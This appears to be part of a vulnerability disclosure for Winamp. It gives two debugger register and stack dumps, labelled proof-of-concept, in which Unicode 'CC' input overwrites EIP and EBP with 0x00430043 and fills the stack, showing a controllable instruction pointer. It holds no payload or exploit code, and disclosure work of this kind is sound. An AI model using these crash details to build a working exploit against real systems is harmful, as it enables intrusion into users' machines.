PROOF-OF-CONCEPT (DEBUG) (Bug #1)
------------------------------------
Registers:
EAX 3B3C08EB
ECX 7C80BAFC kernel32.7C80BAFC
EDX 00430010 winamp.00430010
EBX 0000007E
ESP 00C1F290 UNICODE "CCCCCCCCCCCCCCCCCCCCCCCCCCCC"
EBP 00430043 winamp.00430043
ESI 001961E8
EDI 0000060B
EIP 00430060 winamp.00430060
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_INVALID_WINDOW_HANDLE (00000578)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty +NaN
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Stackview:
ESP-20   > 00430043  CC  winamp.00430043
ESP-1C   > 0043004B  KC  winamp.0043004B
ESP-18   > 7C80BAFC      kernel32.7C80BAFC
ESP-14   > 00430043  CC  winamp.00430043
ESP-10   > 00430043  CC  winamp.00430043
ESP-C    > 00430043  CC  winamp.00430043
ESP-8    > 00430043  CC  winamp.00430043
ESP-4    > 00430043  CC  winamp.00430043
ESP ==>  > 00430043  CC  winamp.00430043
ESP+4    > 00430043  CC  winamp.00430043
ESP+8    > 00430043  CC  winamp.00430043
ESP+C    > 00430043  CC  winamp.00430043
ESP+10   > 00430043  CC  winamp.00430043
ESP+14   > 00430043  CC  winamp.00430043
ESP+18   > 00430043  CC  winamp.00430043
ESP+1C   > 00430043  CC  winamp.00430043
ESP+20   > 00430043  CC  winamp.00430043



PROOF-OF-CONCEPT (DEBUG) (Bug #2)
------------------------------------
Registers:
EAX 00000000
ECX 079A9D68 ml_local.079A9D68
EDX 00380608
EBX 00000000
ESP 00C1E46C UNICODE "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
EBP 00430043 winamp.00430043
ESI 00000000
EDI 00000000
EIP 00430043 winamp.00430043
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_INVALID_WINDOW_HANDLE (00000578)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Stackview:
ESP-20   > 00430043  CC  winamp.00430043
ESP-1C   > 00430043  CC  winamp.00430043
ESP-18   > 00430043  CC  winamp.00430043
ESP-14   > 00430043  CC  winamp.00430043
ESP-10   > 00430043  CC  winamp.00430043
ESP-C    > 00430043  CC  winamp.00430043
ESP-8    > 00430043  CC  winamp.00430043
ESP-4    > 00430043  CC  winamp.00430043
ESP ==>  > 00430043  CC  winamp.00430043
ESP+4    > 00430043  CC  winamp.00430043
ESP+8    > 00430043  CC  winamp.00430043
ESP+C    > 00430043  CC  winamp.00430043
ESP+10   > 00430043  CC  winamp.00430043
ESP+14   > 00430043  CC  winamp.00430043
ESP+18   > 00430043  CC  winamp.00430043
ESP+1C   > 00430043  CC  winamp.00430043
ESP+20   > 00430043  CC  winamp.00430043


